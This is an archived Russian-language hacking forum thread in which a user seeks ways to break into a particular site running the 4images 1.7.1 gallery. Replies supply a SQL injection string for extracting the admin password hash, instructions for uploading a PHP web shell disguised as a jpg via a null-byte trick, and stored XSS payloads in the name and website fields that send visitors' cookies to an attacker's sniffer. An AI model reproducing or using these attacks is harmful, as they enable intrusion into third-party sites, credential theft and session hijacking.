Просмотр полной версии : помогите с уязвимостями 4images
какие есть уязвимости у этой галереи?
Скрипт 4images 1.7.1
Опасность критическая
сайт производителя http://www.4homepages.de/
если в разделе "расширенный поиск" в поле "найти юзера" ввести
[Admin nick]' union select user_password from 4images_users where user_name LIKE '[Admin nick]
то скрипт в ошибку выдаст зашифрованный мд5хеш админа
это я и так нашёл в инете и это не работает.. нужно что-то ещё..
вот здесь - http://forum.web-hack.ru/index.php?showtopic=32196
мне попытались немного помочь и указали на несколько дырок, но я о этих дырках знаю и их уже закрыли на интересующем сайте-галерее. может быть кто-то ещё что-то знает?
Может кто нить знает, как на залить шелл в 4images???
http://ivdb.org/poc/1312.htm----->4images
slime, смотри видео на античате, подробно описано что и как.
Заливаешь шел с расширением jpg, при просмотре картинки добавляем символ конца сроки %00, и php скрипт выпоkyится.
кстати, версии 1.7.1 почти все похеканы... в главноq дире лежит шелл под названием config.new.php
я конечно могу и ошибаться, но если там такой фильтр то мне очень кажется что никак...
злойдядька
23.11.2008, 23:49
активная ХSS в полях имя и сайт.
в поле сайт вводим http://"><img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">
при регистрации вводим имя NAME<img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">
будет отображатся ваше имя, а остальная часть будет не видна
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot